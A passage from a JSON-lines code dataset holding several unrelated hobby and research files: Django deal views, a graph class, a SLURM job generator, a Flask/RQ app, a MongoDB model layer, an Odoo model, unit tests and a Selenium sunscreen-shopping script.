'features_in_nyc_only':features_in_nyc_only\n\n }\n \n if request.method == 'GET':\n \n \n \n return render(request, 'deal/Views/address_asset.html', context)\n \n if request.method == 'POST':\n city = 
request.POST['city']\n state_code = request.POST['state_code']\n location = request.POST['location']\n \n \n if not city:\n messages.error(request, 'City is required')\n return render(request, 'deal/Views/address_asset.html', context)\n if not state_code:\n messages.error(request, 'State code is required')\n return render(request, 'deal/Views/address_asset.html', context)\n \n\n query= request.POST\n query_data = query.copy()\n # print(query_data)\n query_data.pop('csrfmiddlewaretoken')\n d = {k:v.strip('[]') for k,v in query_data.items()}\n print(\"Data to make API call is : \", d)\n\n \n \n \n \n print(\"computing Deal......\\n\")\n response = property_search_query(url = url_for_sale, query_params=d)\n df = process_query_response(response=response)\n #deal_df = pd.read_csv('/Users/home/Documents/GitHub/WhiteCow2/deal/deal_df.csv')\n #df = pd.read_csv('/Users/home/Documents/GitHub/WhiteCow2/sale.csv')\n list_property_id = df['property_id'].tolist()[:3]\n deal_dict = calculate_deal(list_property_id, df)\n \n deal_df = get_deal_datafrane(deal_dict, df)\n \n deal_df = deal_df.where(deal_df.notnull(), None)\n\n deal_df = formatting(deal_df)\n print(\"Here is the Deal \\n\")\n print(deal_df)\n\n context['deals'] = deal_df\n \n \n property_type = d['property_type']\n context['property_type'] = property_type\n\n request.session['city'] = city\n request.session['state_code'] = state_code\n request.session['location'] = location\n request.session['d'] = d\n deal= json.loads(deal_df.to_json())\n request.session['deal_df'] = deal\n\n \n context['deals'] = deal_df\n return render(request, 'deal/Views/address_asset.html', context)\n \n\n\n\n\ndef save_deal(request):\n\n \n \n\n if request.method == 'POST':\n \n name = request.POST.get('name')\n time = request.POST.get('time')\n city = request.session['city'] \n state_code = request.session['state_code']\n location = request.session['location']\n assets = request.session['d']\n deal= request.session['deal_df']\n deal = pd.DataFrame.from_dict(deal)\n\n for i in deal.itertuples():\n \n deal['last_update_date'] = datetime.fromtimestamp(i.last_update_date / 1e3) \n deal['list_date'] = datetime.fromtimestamp(i.list_date / 1e3) \n #deal = formatting(deal)\n \n \n Deals.objects.create(name = name,owner=request.user)\n de = Deals.objects.latest('id')\n if time != \"\":\n if TimeInterval(time) is TimeInterval.one_min:\n Setup.objects.create(title=name,owner=request.user,deal=de,time_interval = TimeInterval.one_min)\n if TimeInterval(time) is TimeInterval.every_day:\n Setup.objects.create(title=name,owner=request.user,deal=de,time_interval = TimeInterval.every_day)\n if TimeInterval(time) is TimeInterval.week_ends:\n Setup.objects.create(title=name,owner=request.user,deal=de,time_interval = TimeInterval.week_ends)\n \n\n \n deal['owner'] = request.user\n deal['deal'] = de\n\n assets.pop('city')\n assets.pop('state_code')\n assets.pop('location')\n assets['owner'] = request.user\n assets['deal'] = de\n \n \n for k in assets :\n if assets[k] == '':\n assets[k] = None\n \n\n \n Adress.objects.create(owner=request.user,deal=de,city=city,state_code=state_code, location=location)\n AssetsForSale.objects.create(**assets)\n\n\n entries = [] \n \n for e in deal.T.to_dict().values():\n\n entries.append(SubscriptionDataForSale(**e))\n \n SubscriptionDataForSale.objects.bulk_create(entries)\n \n \n \n # SubscriptionDataForSale.objects.bulk_create(entries)\n\n return redirect('dashboad')\n\n return render(request, 'deal/Views/address_asset.html')\n\n\ndef 
deal_stats(request):\n todays_date = datetime_.date.today()\n one_month_ago = todays_date - datetime_.timedelta(days=30)\n one_year_ago = todays_date - datetime_.timedelta(days=30*12)\n one_day_ago = todays_date - datetime_.timedelta(days=1)\n \n\n deal_stats_month= SubscriptionDataForSale.objects.filter(owner=request.user,date__gte=one_month_ago).count()\n deal_stats_year= SubscriptionDataForSale.objects.filter(owner=request.user,date__gte=one_year_ago).count()\n deal_stats_day= SubscriptionDataForSale.objects.filter(owner=request.user,date__gte=one_day_ago).count()\n\n deal_stats_land= SubscriptionDataForSale.objects.filter(owner=request.user,description__icontains = \"land\").count()\n deal_stats_multi_family= SubscriptionDataForSale.objects.filter(owner=request.user,description__icontains = \"multi_family\").count()\n deal_stats_single_family= SubscriptionDataForSale.objects.filter(owner=request.user,description__icontains = \"single_family\").count()\n deal_stats_mobile= SubscriptionDataForSale.objects.filter(owner=request.user,description__icontains = \"mobile\").count()\n deal_stats_farm= SubscriptionDataForSale.objects.filter(owner=request.user,description__icontains = \"farm\").count()\n deal_stats_2021= SubscriptionDataForSale.objects.filter(owner=request.user,date__icontains = \"2021\").count()\n finalrep = {'month': deal_stats_month,\n 'year':deal_stats_year,\n 'day': deal_stats_day,\n 'land': deal_stats_land,\n 'multi_family': deal_stats_multi_family,\n 'single_family': deal_stats_single_family,\n 'mobile': deal_stats_mobile,\n 'farm': deal_stats_farm,\n \"year_2021\":deal_stats_2021}\n\n return JsonResponse({'deal_category_data': finalrep}, safe=False)\n\n\ndef view_deal_detail(request, pk):\n\n deal = Deals.objects.get(pk=pk)\n\n data = SubscriptionDataForSale.objects.filter(deal_id =pk, owner=request.user)\n\n deal_df = read_frame(data)\n \n context = {\n 'deals':deal_df\n }\n return render(request,'deal/Views/deal-detail.html',context )\n\n\n\ndef deal_delete(request, pk):\n subscription = SubscriptionDataForSale.objects.filter(owner=request.user, deal_id = pk)\n setup = Setup.objects.filter(owner=request.user, deal_id = pk)\n asset = AssetsForSale.objects.filter(owner=request.user, deal_id = pk)\n address = Adress.objects.filter(owner=request.user, deal_id = pk)\n deal = Deals.objects.filter(owner=request.user, pk = pk) \n\n \n subscription.delete()\n setup.delete()\n address.delete()\n asset.delete()\n deal.delete()\n \n\n return redirect('dashboad')\n \n@login_required\ndef manage_subscriptions(request):\n \"\"\"\n Thie view is to display the subcriptions(saved deals) a user has made\n \"\"\"\n \n deal = Deals.objects.filter(owner = request.user)\n setup = Setup.objects.filter(owner = request.user)\n setupOne = Setup.objects.filter(owner = request.user).first()\n return render(request, 'deal/Views/subscriptions.html',{'deals':setup,'setup':setupOne})\n\n\ndef edit_subscriptions(request, id):\n\n setup = Setup.objects.get(pk = id)\n deals = Deals.objects.get(pk=setup.deal_id)\n\n #if request.method =='POST':\n data = request.POST\n if 'toggle' in data:\n toggle = request.POST['toggle']\n name = request.POST['name']\n time = request.POST['time']\n #import pdb\n # pdb.set_trace()\n\n if time != \"\":\n if TimeInterval(time) is TimeInterval.one_min:\n \n setup.time_interval = TimeInterval.one_min\n if TimeInterval(time) is TimeInterval.every_day:\n setup.time_interval = TimeInterval.every_day\n if TimeInterval(time) is TimeInterval.week_ends:\n setup.time_interval = 
TimeInterval.week_ends\n \n setup.owner= request.user\n deals.name = name\n setup.title = name\n setup.status = SetupStatus.active\n\n setup.save()\n deals.save()\n\n else:\n name = request.POST['name']\n time = request.POST['time']\n \n\n if time != \"\":\n if TimeInterval(time) is TimeInterval.one_min:\n setup.time_interval = TimeInterval.one_min\n if TimeInterval(time) is TimeInterval.every_day:\n setup.time_interval = TimeInterval.every_day\n if TimeInterval(time) is TimeInterval.week_ends:\n setup.time_interval = TimeInterval.week_ends\n \n setup.owner= request.user\n deals.name = name\n setup.title = name\n setup.status = SetupStatus.disabled\n\n setup.save()\n deals.save()\n \n\n #return JsonResponse(list(data), safe=False)\n\n return redirect('subscriptions')\n\n #return render(request, 'deal/Views/subscriptions.html')","sub_path":"deal/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":14231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"313416115","text":"from vertex import *\nimport pdb\n\nclass Graph(object):\n def __init__(self):\n self.vertices = {}\n\n def add_vertex(self, vertex):\n self.vertices[vertex.key] = vertex\n\n def get_vertex(self, key):\n try:\n return self.vertices[key]\n except KeyError:\n return None\n\n def __contains__(self, key):\n return key in self.vertices\n\n def add_edge(self, from_key, to_key, weight = 0):\n if from_key not in self.vertices:\n self.add_vertex(Vertex(from_key))\n if to_key not in self.vertices:\n self.add_vertex(Vertex(to_key))\n self.vertices[from_key].add_neighbor(self.vertices[to_key], weight)\n\n def get_vertices(self):\n return self.vertices.keys()\n\n def __iter__(self):\n return iter(self.vertices.values())\n\ng = Graph()\nfor i in range(6):\n g.add_vertex(Vertex(i))\n\ng.add_edge(0, 1, 5)\ng.add_edge(0, 5, 2)\ng.add_edge(1, 2, 4)\ng.add_edge(2, 3, 9)\ng.add_edge(3, 4, 7)\ng.add_edge(3, 5, 3)\ng.add_edge(4, 0, 1)\ng.add_edge(5, 4, 8)\ng.add_edge(5, 2, 1)\n\nfor v in g:\n for w in v.get_connections():\n print(str(w))\n\njson_graph = {}\nfor key, vertex in g.vertices.iteritems():\n for neighbor, weight in vertex.neighbors.iteritems():\n # pdb.set_trace()\n if json_graph.get(key) is None:\n json_graph[key] = {}\n json_graph[key][neighbor.key] = weight\n\njson_graph2 = {outer_k: {inner_k.key: inner_v for inner_k, inner_v in outer_v.neighbors.iteritems()} for outer_k, outer_v in g.vertices.iteritems()}\n\nprint(json_graph)\nprint(json_graph2)\n","sub_path":"data-structures/graphs/python/graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":1584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"583568847","text":"import sys\nsys.setrecursionlimit(10**7)\n\ninput = sys.stdin.readline\n\nstring = input().rstrip()\nboom = input().rstrip()\nstack = []\n\nfor i in range(len(string)):\n stack.append(string[i])\n bang = False\n if len(stack) >= len(boom):\n bang = True\n for j in range(len(boom)):\n index = len(stack) - len(boom) + j\n if stack[index] != boom[j]:\n bang = False\n break\n if bang:\n for j in range(len(boom)):\n stack.pop()\n continue\n\nif stack:\n for i in stack:\n print(i, end=\"\")\nelse:\n print(\"FRULA\")","sub_path":"String/BOJ9935문자열폭발_TIN.py","file_name":"BOJ9935문자열폭발_TIN.py","file_ext":"py","file_size_in_byte":599,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"610254864","text":"# -*- coding: utf-8 -*-\nimport 
subprocess\nimport time\n\nimport click\n\nFEATURES = [\n \"TI-19\",\n # \"FI-16\",\n # \"TI-33\",\n # \"FI-2\",\n # \"FI-151\",\n # \"TI-8\",\n # \"FI-241\",\n # \"valve-position-12\", # dry-bed\n # \"FI-38\", # strippera\n # \"PI-28\", # stripper\n # \"TI-28\", # stripper\n # \"FI-20\",\n # \"FI-30\",\n \"TI-3\",\n \"FI-19\",\n # \"FI-211\",\n \"FI-11\",\n # \"TI-30\",\n # \"PI-30\",\n \"TI-1213\",\n # \"TI-4\",\n # \"FI-23\",\n # \"FI-20\",\n # \"FI-20/FI-23\",\n # \"TI-22\",\n # \"delta_t\",\n \"TI-35\",\n # \"delta_t_2\"\n]\n\nSLURM_SUBMISSION_TEMPLATE = \"\"\"#!/bin/bash -l\n#SBATCH --chdir ./\n#SBATCH --mem 32GB\n#SBATCH --ntasks 1\n#SBATCH --cpus-per-task 4\n#SBATCH --job-name {name}\n#SBATCH --time 72:00:00\n#SBATCH --partition serial\n\nsource /home/kjablonk/anaconda3/bin/activate\nconda activate aeml\n\npython -u run_gbdt_scenarios.py {feature_a} {feature_b} {objective} {forecast}\n\"\"\"\n\n\ndef write_submission_script(feature_a, feature_b, objective, forecast):\n submission_name = f\"scenario_{feature_a}_{feature_b}_{objective}_{str(forecast)}\".replace(\n \"/\", \"*\"\n )\n\n fc = \"--forecast\" if forecast else \"\"\n script_content = SLURM_SUBMISSION_TEMPLATE.format(\n **{\n \"name\": submission_name,\n \"feature_a\": feature_a,\n \"feature_b\": feature_b,\n \"objective\": objective,\n \"forecast\": fc,\n }\n )\n scriptname = f\"{submission_name}.slurm\"\n with open(scriptname, \"w\") as handle:\n handle.write(script_content)\n return scriptname\n\n\n@click.command(\"cli\")\n@click.option(\"--submit\", is_flag=True)\n@click.option(\"--forecast\", is_flag=True)\ndef run(submit, forecast):\n\n for objective in [\"amp\", \"pz\"]:\n for i, feature_a in enumerate(FEATURES):\n for j, feature_b in enumerate(FEATURES):\n if i < j:\n filename = write_submission_script(feature_a, feature_b, objective, forecast)\n if submit:\n subprocess.call(f\"sbatch {filename}\", shell=True)\n time.sleep(2)\n\n\nif __name__ == \"__main__\":\n run()\n","sub_path":"paper/loop_over_maps_gbdt.py","file_name":"loop_over_maps_gbdt.py","file_ext":"py","file_size_in_byte":2233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"646086181","text":"import os, json\nfrom flask import Flask, request, render_template\nfrom rq import Queue\nfrom worker import conn\nfrom worker_tasks import run_script\n\napp = Flask(__name__)\nq = Queue(connection=conn)\n\ndef get_status(job):\n app_url = 'https://mnist-rdm.herokuapp.com'\n status = {\n 'id': job.id,\n 'result': job.result,\n 'status': '',\n 'message': '',\n 'link': ''\n }\n options = {\n 'status': 'failed'\n } if job.is_failed else {\n 'status': 'pending',\n 'message': 'Still working. 
Wait a few minutes and click the link to see if the job is ready.',\n 'link': 'Click here.'.format(app_url, job.id)\n } if job.result == None else {\n 'status': 'completed'\n }\n status.update(options)\n status.update(job.meta)\n return status\n\n@app.route(\"/\")\ndef handle_job():\n query_id = request.args.get('job')\n if query_id:\n found_job = q.fetch_job(query_id)\n if found_job:\n if found_job.result:\n response = render_template('output.html', output=found_job.result)\n else:\n response = render_template('wait.html', status=get_status(found_job))\n else:\n response = { 'id': None, 'error_message': 'No job exists with the id number ' + query_id }\n else:\n new_job = q.enqueue(run_script, timeout='1h')\n response = render_template('wait.html', status=get_status(new_job))\n return response\n\nif __name__ == \"__main__\":\n port = int(os.environ.get(\"PORT\", 5000))\n app.run(host='0.0.0.0', port=port)","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"333156625","text":"''''\nSplitting functions\na selection of ways to split a given area\nusing a numpy array 'd' of the CSO small area centroids\n'''\n\ndef long_side(d):\n\n # the length from East to West is compared with South to North\n # using centroid ITM coordinates\n # the new split is across the long side\n e_max = d[\"Easting\"].max()\n e_min = d[\"Easting\"].min()\n\n e_length = e_max - e_min\n\n\n n_max = d[\"Northing\"].max()\n n_min = d[\"Northing\"].min()\n\n n_length = n_max - n_min\n\n # choose to cut on longer side\n if n_length > e_length:\n axis = 'Northing'\n else:\n axis = 'Easting'\n\n return axis\n\n","sub_path":"Long_Split.py","file_name":"Long_Split.py","file_ext":"py","file_size_in_byte":626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"255086576","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport time, datetime\nimport requests\n\nprint(\"\"\"Availability log of the PMH service on juser.fz-juelich.de.\n\nThe check happens every minute. Times are CEDT. Only the first chunk is\nfetched. Time between re-tries is 2 seconds, or the content of the Retry-After\nheader if given. 
Maximal number of re-tries is 20.\n\nThe timeout for a response is 5 seconds.\n\"\"\")\n\nlast_timestamp = 0\nwhile True:\n    time.sleep(max(60 - (time.time() - last_timestamp), 0))\n    last_timestamp = time.time()\n    print(datetime.datetime.fromtimestamp(time.time()).strftime(\"%c \"), end=\"\")\n    params = {\"verb\": \"ListRecords\", \"metadataPrefix\": \"marcxml\", \"set\": \"VDB\"}\n    cycles_left = 21\n    while cycles_left:\n        try:\n            response = requests.get(\"https://juser.fz-juelich.de/oai2d\", params=params, timeout=5)\n        except requests.exceptions.Timeout:\n            print(\"[Timeout] \", end=\"\")\n            response = None\n        except Exception as error:\n            print(\"[Error: {}]\".format(repr(error)))\n            response = None\n        else:\n            if response.status_code == 200:\n                print(\"Re-tries needed:\", 21 - cycles_left, flush=True)\n                break\n        cycles_left -= 1\n        time.sleep(2 if response is None or response.status_code != 503 else int(response.headers.get(\"Retry-After\") or \"2\"))\n    else:\n        print(\"Failed.\", flush=True)\n","sub_path":"availability.py","file_name":"availability.py","file_ext":"py","file_size_in_byte":1353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"5295113","text":"# coding=utf-8\n__author__ = 'Bosco_Vallejo-Nágera y Miguel Tello'\nfrom pymongo import MongoClient, errors\nimport json\nfrom time import sleep\naddresses = {}\nCLIENT_VARS_PATH = \"Vars/client.ini\"\nPRODUCT_VARS_PATH = \"Vars/product.ini\"\nPROVIDER_VARS_PATH = \"Vars/provider.ini\"\nSALE_VARS_PATH = \"Vars/sale.ini\"\nSLEEP_TIME = 5\nADDRESS_SUBSTRING = \"direccion\"\n\n\ndef getCityGeoJSON(address):\n    \"\"\" Returns the coordinates of an address, given the address as a str\n    Arguments:\n        address (str) -- Address\n    Return:\n        (str) -- GeoJSON\n    \"\"\"\n    if address in addresses:\n        return addresses[address]\n    else:\n        from geopy.geocoders import Nominatim\n        geolocator = Nominatim(user_agent=\"practica-abbdd\")\n        location = geolocator.geocode(address)\n        sleep(SLEEP_TIME)\n        geojson = json.dumps({'type': 'Point', 'coordinates': [\n            location.latitude, location.longitude]})\n        addresses[address] = geojson\n        return geojson\n\n\nclass ModelCursor:\n    \"\"\" Cursor for iterating over the documents returned by a\n    query. 
The documents must be returned as model\n    objects.\n    \"\"\"\n\n    def __init__(self, model_class, command_cursor):\n        self.model_class = model_class\n        self.command_cursor = command_cursor\n\n    def next(self):\n        \"\"\" Returns the next document as a model\n        \"\"\"\n        if self.alive:\n            try:\n                return self.model_class(**self.command_cursor.next())\n            except AttributeError as err:\n                print(err)\n            except StopIteration:\n                print(\"No more documents available in cursor\")\n        else:\n            print(\"No more documents available in cursor\")\n\n    @property\n    def alive(self):\n        \"\"\"True if there are more models to return, False otherwise\n        \"\"\"\n        return self.command_cursor.alive\n\n\nclass Model:\n    db = None\n\n    def __init__(self, **kwargs):\n        required_check = []\n        additional_ad = []\n        required_check.extend(self.required_vars)\n        self._id = None\n        for k, v in kwargs.items():\n            if ADDRESS_SUBSTRING in k:\n                dict = {}\n                for addr in v:\n                    dict[addr] = getCityGeoJSON(addr)\n                required_check.remove(k)\n                setattr(self, k, dict)\n                continue\n            if k not in self.required_vars:\n                if k not in self.admissible_vars:\n                    print(\"Variable {} not admitted for the {} class\".format(\n                        k, type(self).__name__))\n                else:\n                    additional_ad.append(k)\n                setattr(self, k, v)\n            else:\n                required_check.remove(k)\n                setattr(self, k, v)\n        if required_check:\n            raise AttributeError(\n                \"Not all the required attributes were given, missing {}\".format(required_check))\n            return\n        self.admissible_vars.clear()\n        self.admissible_vars.extend(additional_ad)\n        if self._id is None:\n            self.save()\n\n    def save(self):\n        doc = {}\n        for v in self.required_vars + self.admissible_vars:\n            doc[v] = getattr(self, v)\n        try:\n            x = db[self.collection].insert_one(doc)\n        except errors.DuplicateKeyError as err:\n            print(err)\n            for k, v in db[self.collection].find_one({'_id': self._id}).items():\n                if doc[k] == v:\n                    del doc[k]\n            self.update(**doc)\n        else:\n            self._id = x.inserted_id\n            self.admissible_vars.append(\"_id\")\n\n    def update(self, **kwargs):\n        for k, v in kwargs.items():\n            db[self.collection].update_one(\n                {'_id': self._id}, {'$set': {k: v}})\n\n    @classmethod\n    def query(cls, query):\n        cursor = db[cls.collection].aggregate(query)\n        return ModelCursor(cls, cursor)\n\n    @classmethod\n    def init_class(cls, db, vars_path):\n        cls.db = db\n        import configparser\n        config = configparser.ConfigParser(allow_no_value=True)\n        config.read(vars_path)\n        cls.required_vars.extend(config['Required Variables'])\n        cls.admissible_vars.extend(config['Admitted Variables'])\n\n\nclass Client(Model):\n    required_vars = []\n    admissible_vars = []\n    collection = 'clientes'\n\n\nclass Product(Model):\n    required_vars = []\n    admissible_vars = []\n    collection = 'productos'\n\n\nclass Sale(Model):\n    required_vars = []\n    admissible_vars = []\n    collection = 'compras'\n\n    def allocate(self):\n        closest_warehouse = {}\n        warehouses = []\n        for product in self.productos:\n            cursor = Product.query({'$match': {'nombre': product}})\n            provider_list = []\n            while cursor.alive:\n                instance = cursor.next()\n                if instance is not None:\n                    provider_list.extend(instance.proveedores)\n            addrs = {}\n            for provider in provider_list:\n                cursor_two = Provider.query({'$match': {'nombre': product}})\n\n\n\n\nclass Provider(Model):\n    required_vars = []\n    admissible_vars = []\n    collection = 'proveedores'\n\n\nclient = MongoClient()\ndb = client.data\nProvider.init_class(db, PROVIDER_VARS_PATH)\nClient.init_class(db, CLIENT_VARS_PATH)\nSale.init_class(db, SALE_VARS_PATH)\nProduct.init_class(db, PRODUCT_VARS_PATH)\n\n# 
Q1: list all the purchases of a given client\nnombre_cliente = \"Ramon\"\nQ1 = []\npipeline = [{'$match': {'cliente': nombre_cliente}}]\nQ1_cursor = Sale.query(pipeline)\nwhile Q1_cursor.alive:\n    instance = Q1_cursor.next()\n    if instance is not None:\n        Q1.append(instance)\n# Q2: list all the providers for a given product\nnombre_producto = \"tv\"\nQ2 = []\npipeline = [{'$match': {'nombre': nombre_producto}}]\nQ2_cursor = Product.query(pipeline)\nwhile Q2_cursor.alive:\n    instance = Q2_cursor.next()\n    if instance is not None:\n        Q2.extend(instance.proveedores)\nQ2 = list(dict.fromkeys(Q2))\n# Q3: list all the distinct products bought by a given client\nnombre_cliente = \"Emilia\"\nQ3 = []\npipeline = [{'$match': {'cliente': nombre_cliente}}]\nQ3_cursor = Sale.query(pipeline)\nwhile Q3_cursor.alive:\n    instance = Q3_cursor.next()\n    if instance is not None:\n        Q3.extend(instance.productos)\nQ3 = list(dict.fromkeys(Q3))\n\nif __name__ == '__main__':\n    for k in Q1:\n        print(\"{} {}\".format(k._id, k.direccion))\n    print(Q2)\n    print(Q3)\n","sub_path":"P1_G11_Bosco_Vallejo_y_Miguel_Tello.py","file_name":"P1_G11_Bosco_Vallejo_y_Miguel_Tello.py","file_ext":"py","file_size_in_byte":6557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"141985387","text":"from odoo import models, fields, api\n\nclass Votes(models.Model):\n\t_name = 'employee.ideas.votes'\n\t\n\tideas_id = fields.Many2one('employee.ideas','EmployeeIdeas',default=lambda self: self.env.context.get('ideas_id', False))\n\t\n\temployee = fields.Many2one('hr.employee', string='Employee', default=lambda self: self._get_default_employee(), readonly=True, store=True)\n\t\n\tdepartment = fields.Many2one('hr.department', 'department')\n\t\n\trating = fields.Selection([\n\t\t\t(0, 'Worst'),\n\t\t\t(1, 'Very Bad'),\n            (2, 'Bad'),\n            (3, 'Not Bad'),\n            (4, 'Good'),\n            (5, 'Very Good'),\n            ],default=0)\n\n\tcomments = fields.Char('Comments', required=True)\n\t\n\t@api.model\n\tdef _get_default_employee(self) :\n\t\tuser_id = self.env.uid\n\t\tself._cr.execute('SELECT hr_employee.id FROM hr_employee, resource_resource WHERE hr_employee.resource_id = resource_resource.id AND resource_resource.user_id = %s', (user_id,))\n\t\trow = self._cr.fetchone()\n\t\treturn row[0] if row else False\n\t\t\n\t@api.multi\n\tdef write(self, vals) :\n\t\tif vals.get('employee', False) :\n\t\t\tvals['employee'] = self._get_default_employee()\n\t\t\n\t\treturn super(Votes, self).write(vals)\n\t\t\n\t@api.model\n\tdef create(self, vals) :\n\t\tif not vals.get('employee'):\n\t\t\tvals['employee'] = self._get_default_employee()\n\t\t\n\t\treturn super(Votes, self).create(vals)","sub_path":"employee_ideas/models/votes.py","file_name":"votes.py","file_ext":"py","file_size_in_byte":1307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"224632250","text":"s = input()\nget = input()[1:-1]\npairs = []\nfor i in range(0, len(get) - 4, 6):\n    pairs.append(list(map(int, get[i:i + 5][1::2])))\nwhile True:\n    over = True\n    for i in range(len(pairs)):\n        x = pairs[i][0]\n        y = pairs[i][1]\n        if s[x] > s[y]:  # if not in lexicographic order, swap\n            s = s[:x] + s[y] + s[x+1:y] + s[x] + s[y+1:]\n            over = False\n    if over:\n        break\nprint(s)\n","sub_path":"Code/CodeRecords/2718/60632/237767.py","file_name":"237767.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"177099692","text":"import unittest\nimport os\nimport 
tempfile\nimport main.gityo.config as config\nimport main.gityo.repo as repo\nimport main.gityo.gitx as gitx\n\n\nclass ConfigTests(unittest.TestCase):\n def test_search_config_file(self):\n file = config.search_config_file('pakyo-settings.yml')\n no_file = config.search_config_file('i-am-not-a-file')\n self.assertTrue(os.path.isfile(file))\n self.assertIsNone(no_file)\n\n def test_load_app_settings__file_not_found(self):\n def act():\n file_not_exists = tempfile.mktemp()\n config.load_app_settings(app_settings_file=file_not_exists)\n self.assertRaises(config.ConfigFileError, act)\n\n def test_load_app_settings__file_without_root(self):\n def act():\n yml = create_yml('foo:\\n'\n ' bar:\\n'\n ' value')\n config.load_app_settings(app_settings_file=yml)\n self.assertRaises(KeyError, act)\n\n def test_load_app_settings(self):\n yml = create_yml('settings:\\n'\n ' a:\\n'\n ' b\\n'\n ' c: d')\n data = config.load_app_settings(app_settings_file=yml)\n value = config.load_app_settings(key='c', app_settings_file=yml)\n self.assertEqual(data['a'], 'b')\n self.assertEqual(value, 'd')\n\n\nclass GitxTests(unittest.TestCase):\n pass\n\n\nclass RepoTests(unittest.TestCase):\n def test_load_repo_config(self):\n yml = create_yml('repos:\\n'\n ' foo:\\n'\n ' branches: dev master\\n'\n ' remote: git@git.com\\n'\n ' bar:\\n'\n ' branches: dev\\n'\n ' remote: git@xxx.com\\n')\n repos = repo.load_repo_config(yml)\n self.assertTrue(len(repos) == 3)\n self.assertTrue(len([r for r in repos if r.branch == 'dev']) == 2)\n\n def test_open__invalid_remote(self):\n bucket = repo.RepoBucket(tempfile.mkdtemp())\n info = repo.RepoInfo(name='foo', remote='not-a-remote', branch='dev')\n def act():\n with bucket.open(info):\n pass\n self.assertRaises(gitx.GitError, act)\n\n def test_open(self):\n bucket = repo.RepoBucket(tempfile.mkdtemp())\n remote = create_git_repo()\n info = repo.RepoInfo(name='foo', remote=remote, branch='master')\n with bucket.open(info) as r:\n state = r.state\n self.assertEqual(r.state, repo.RepoState.AVAILABLE)\n self.assertEqual(state, repo.RepoState.BEING_USED)\n self.assertTrue(os.path.isdir(r.root_path))\n\n def test_open_multiple_time(self):\n bucket = repo.RepoBucket(tempfile.mkdtemp())\n remote = create_git_repo()\n info = repo.RepoInfo(name='foo', remote=remote, branch='master')\n with bucket.open(info) as r:\n root_path = r.root_path\n repo1 = r\n with bucket.open(info) as r:\n repo2 = r\n self.assertEqual(repo1, repo2)\n self.assertEqual(root_path, repo2.root_path)\n self.assertTrue(os.path.isdir(r.root_path))\n\n def test_save_load(self):\n bucket = repo.RepoBucket(tempfile.mkdtemp())\n remote = create_git_repo()\n info = repo.RepoInfo(name='foo', remote=remote, branch='master')\n with bucket.open(info) as r:\n pass\n bucket.save_data()\n another_bucket = repo.RepoBucket(bucket.path)\n another_bucket.load_data()\n self.assertEqual(another_bucket.repos[0].id, bucket.repos[0].id)\n self.assertEqual(another_bucket.repos[0].root_path, bucket.repos[0].root_path)\n self.assertEqual(another_bucket.repos[0].state, bucket.repos[0].state)\n\n\n\ndef create_yml(content):\n tmp = tempfile.mkstemp()[1]\n with open(tmp, mode='w') as file:\n file.write(content)\n return tmp\n\ndef create_git_repo():\n path = tempfile.mkdtemp()\n git = gitx.Git()\n git.quiet = True\n git.cwd = path\n git.execute('init', path)\n foo_file = os.path.join(path, 'foo')\n with open(foo_file, mode='w') as f:\n f.write('bar')\n git.execute('add', foo_file)\n git.execute('config user.email \\\"no@mail.com\\\"')\n 
git.execute('config user.name \\\"no-one\\\"')\n    git.execute('commit -a -m whatever')\n    return path\n","sub_path":"web/tests/test_gityo.py","file_name":"test_gityo.py","file_ext":"py","file_size_in_byte":4446,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"341181108","text":"'''\nFinding the most expensive sunscreen:\nAdd the costliest sunscreen to the cart on https://weathershopper.pythonanywhere.com/sunscreen\n----------------------------------\nPython 3.7.0 and Selenium 3.141.0\n----------------------------------\nAuthor : Srinivasa Varun\nE-mail : tcvarun96@gmail.com'''\n\nfrom selenium import webdriver\nimport time\n\ndriver = webdriver.Firefox()\ndriver.maximize_window()\ndriver.get('http://weathershopper.pythonanywhere.com/sunscreen')  # open the weather shopper page\n\ntime.sleep(2)  # give the page time to load\n\ndriver1 = driver.find_elements_by_xpath(\"//p[contains(.,'Price:')]\")  # XPath for the price elements\n\n\nlist1 = []\nlist2 = []\nfor i in driver1:\n    list2.append(i.text.split(\"\\n\"))\n    list1.append(i.text)  # collect the raw price texts\n\n# split the list into two pseudo lists, since the two halves need different parsing\npseudo_list1 = list1[:3]\nlist3 = [int(sub.split('.')[1]) for sub in pseudo_list1]\n\npseudo_list2 = list1[3:]\nlist4 = [int(sub.split(':')[1]) for sub in pseudo_list2]\n\n# concatenate the two pseudo lists of ints\nconcat_list = list3+list4\nprint(concat_list)\nmax_val=max(concat_list)  # find the maximum price\nmax_index=concat_list.index(max_val)  # find the index of the maximum price\nprint(max_val)\nprint(max_index)\n\n# get all button objects and click the button of the highest-priced sunscreen\nbutton=driver.find_elements_by_xpath('//button[contains(@class,\"btn btn-primary\")]')\nbutton=button[max_index]\nbutton.click()\n\ntime.sleep(5)\n\n# click the cart button and show the cart\n\ncart=driver.find_element_by_id(\"cart\")\ncart.click()\ntime.sleep(5)\n\nif(driver.current_url == \"http://weathershopper.pythonanywhere.com/cart\"):\n    print(\"Successfully Added\")\nelse:\n    print(\"Failure\")\n\ntime.sleep(2)\n# close the 